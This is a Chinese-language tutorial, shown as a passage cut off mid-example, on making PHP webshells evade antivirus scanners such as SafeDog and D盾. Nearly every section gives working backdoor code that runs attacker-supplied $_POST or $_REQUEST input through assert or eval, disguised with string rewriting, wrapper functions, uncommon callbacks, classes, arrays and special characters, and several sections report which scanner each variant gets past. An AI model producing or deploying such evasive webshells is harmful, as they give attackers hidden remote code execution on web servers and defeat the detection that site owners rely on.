<h1 style="margin: 0px 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x01 前言</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x02 目录</span></h1><ol><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">关于eval 与 assert</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">字符串变形</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">定义函数绕过</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">回调函数</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">回调函数变形</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">特殊字符干扰</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">数组</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">类</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">编码绕过</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">无字符特征马</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">PHP7.1后webshell何去何从</span></span></span></p></li><li><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">总结</span></span></span></p></li></ol><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x03 关于eval 于 assert</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">关于eval函数在php给出的官方说明是</span></p><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);">eval 是一个语言构造器而不是一个函数，不能被 可变函数 调用 可变函数：通过一个变量，获取其对应的变量值，然后通过给该值增加一个括号()，让系统认为该值是一个函数，从而当做函数来执行 通俗的说比如你 <code class=""><span style="margin: 0px; padding: 0px 2px;"><?</span><span style="margin: 0px; padding: 0px 2px;">php $a</span><span style="margin: 0px; padding: 0px 2px;">=</span><span style="margin: 0px; padding: 0px 2px;">eval</span><span style="margin: 0px; padding: 0px 2px;">;</span><span style="margin: 0px; padding: 0px 2px;">$a</span><span style="margin: 0px; padding: 0px 2px;">()</span><span style="margin: 0px; padding: 0px 2px;">?></span></code> 这样是不行的 也造就了用eval的话达不到assert的灵活，但是在php7.1以上assert已经不行</span></p><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">关于assert函数</span></p><p style="margin: 0px; padding: 0px;"><span style="color: rgb(74, 74, 74);">assert() 回调函数在构建自动测试套件的时候尤其有用，因为它们允许你简易地捕获传入断言的代码，并包含断言的位置信息。 当信息能够被其他方法捕获，使用断言可以让它更快更方便！</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x04 字符串变形</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">字符串变形多数用于BYPASS安全狗，相当对于D盾，安全狗更加重视"形" 一个特殊的变形就能绕过安全狗，看看PHP手册，有着很多关于操作字符串的函数</span></p><pre>ucwords()&nbsp;//函数把字符串中每个单词的首字符转换为大写。
ucfirst()&nbsp;//函数把字符串中的首字符转换为大写。
trim()&nbsp;//函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace()&nbsp;//函数把字符串的一部分替换为另一个字符串
substr()&nbsp;//函数返回字符串的一部分。
strtr()&nbsp;//函数转换字符串中特定的字符。
strtoupper()&nbsp;//函数把字符串转换为大写。
strtolower()&nbsp;//函数把字符串转换为小写。
strtok()&nbsp;//函数把字符串分割为更小的字符串
str_rot13()&nbsp;//函数对字符串执行&nbsp;ROT13&nbsp;编码。</pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">由于PHP的灵活性操作字符串的函数很多，我这里就不一一列举了</span></p><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">用 <code class=""><span style="margin: 0px; padding: 0px 2px;">substr_replace</span><span style="margin: 0px; padding: 0px 2px;">()</span></code> 函数变形assert 达到免杀的效果</span></p><pre><code><ol class="list-paddingleft-2" style="margin: 0px; padding: 0px 0px 0px 2.2em; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; list-style-type: none;"><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"><?</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">php</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">$a </span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">=</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> substr_replace</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">(</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">"assexx"</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">,</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">"rt"</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">,</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">4</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">);</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">$a</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">(</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">$_POST</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">[</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">&#39;x&#39;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">]);</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">?></span></code></span></span></span></p></li></ol></code></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">其他函数类似 不一一列举了</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x05 定义函数绕过</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">定义一个函数把关键词分割达到bypass效果</span></p><pre><?php&nbsp;
function&nbsp;kdog($a){
&nbsp;&nbsp;&nbsp;&nbsp;$a($_POST[&#39;x&#39;]);
}
kdog(assert);
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">反之</span></p><pre><?php
&nbsp;function&nbsp;kdog($a)
&nbsp;{&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;assert($a);
&nbsp;}
&nbsp;kdog($_POST[x]);
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">效果一样，这种绕过方法，对安全狗还是比较有效的 在d盾面前就显得小儿科了 ，不过后面会讲到如何用定义函数的方法来 绕过d盾</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x05 回调函数</span></h1><pre>call_user_func_array()call_user_func()
array_filter()&nbsp;
array_walk()&nbsp;&nbsp;
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()&nbsp;
filter_var_array()&nbsp;
uasort()&nbsp;
uksort()&nbsp;
array_reduce()
array_walk()&nbsp;
array_walk_recursive()</pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如</span></p><pre><?php&nbsp;forward_static_call_array(assert,array($_POST[x]));?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">这个函数能过狗，但是D盾显示是一级</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x05 回调函数变形</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">前面说过众多回调函数已经被加入豪华套餐了，怎么绕过呢，其实也很简单 那就是定义个函数 或者类来调用</span></p><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">定义一个函数</span></p><pre><?php
function&nbsp;test($a,$b){
&nbsp;&nbsp;&nbsp;&nbsp;array_map($a,$b);
}
test(assert,array($_POST[&#39;x&#39;]));
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">定义一个类</span></p><pre><?php
class&nbsp;loveme&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;var&nbsp;$a;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;var&nbsp;$b;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;__construct($a,$b)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->a=$a;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->b=$b;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;test()&nbsp;{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;array_map($this->a,$this->b);&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;$p1=new&nbsp;loveme(assert,array($_POST[&#39;x&#39;]));
&nbsp;&nbsp;&nbsp;&nbsp;$p1->test();
?></pre><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x06 特殊字符干扰</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">特殊字符干扰，要求是能干扰到杀软的正则判断，还要代码能执行,网上广为流传的连接符</span></p><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">初代版本</span></p><pre><?php
$a&nbsp;=&nbsp;$_REQUEST[&#39;a&#39;];
$b&nbsp;=&nbsp;null;eval($b.$a);
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">不过已经不能免杀了，利用适当的变形即可免杀 如</span></p><pre><?php
$a&nbsp;=&nbsp;$_POST[&#39;a&#39;];
$b&nbsp;=&nbsp;"\n";
eval($b.=$a);
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">其他方法大家尽情发挥如"\r\n\t",函数返回，类，等等</span></p><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册</span></p><pre><?php
function&nbsp;dog($a){
&nbsp;&nbsp;&nbsp;&nbsp;\assert($a);
}
&nbsp;&nbsp;&nbsp;&nbsp;dog($_POST[x]);
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">当然还有其他的符号熟读PHP手册就会有不一样的发现</span></p><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x07 数组</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">把执行代码放入数组中执行绕过</span></p><pre><?php
$a&nbsp;=&nbsp;substr_replace("assexx","rt",4);
$b=[&#39;&#39;=>$a($_POST[&#39;q&#39;])];
?></pre><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">多维数组</span></p><pre><?php
$b&nbsp;=&nbsp;substr_replace("assexx","rt",4);
$a&nbsp;=&nbsp;array($arrayName&nbsp;=&nbsp;array(&#39;a&#39;&nbsp;=>&nbsp;$b($_POST[&#39;q&#39;])));
?></pre><h1 style="margin: 1.5rem 0px 1rem; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">0x08 类</span></h1><p style="margin: 15px 0px; padding: 0px; text-align: start;"><span style="color: rgb(74, 74, 74);">说到类肯定要搭配上魔术方法比如 <code class=""><span style="margin: 0px; padding: 0px 2px;">__destruct</span><span style="margin: 0px; padding: 0px 2px;">()</span></code>， <code class=""><span style="margin: 0px; padding: 0px 2px;">__construct</span><span style="margin: 0px; padding: 0px 2px;">()</span></code>直接上代码</span></p><pre><code><ol class="list-paddingleft-2" style="margin: 0px; padding: 0px 0px 0px 2.2em; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; list-style-type: none;"><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"><?</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">php </span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">class</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> me</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">{</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> &nbsp;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">public</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> $a </span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">=</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> </span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">&#39;&#39;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">;</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> &nbsp;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">function</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> __destruct</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">(){</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><br/></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: normal; display: flex; overflow: initial; line-height: 12px; border: 0px; font-size: 10px; font-family: inherit !important; white-space: pre !important;"><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;"> &nbsp; &nbsp;</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">assert</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">(</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">"$this->a"</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 20px; font-size: 13px !important; white-space: inherit !important;">);</span></code></span></span></span></p></li><li style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important;"><p style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; word-wrap: break-word !important; clear: both; min-height: 1em;"><span style="color: rgb(74, 74, 74);"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: block; line-height: 22px; font-size: 14px !important; word-break: inherit !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; word-wrap: break-word !important; line-height: 22px; display: block; word-break: inherit !important;"><code style="margin: 0px 0px 0px -20px; 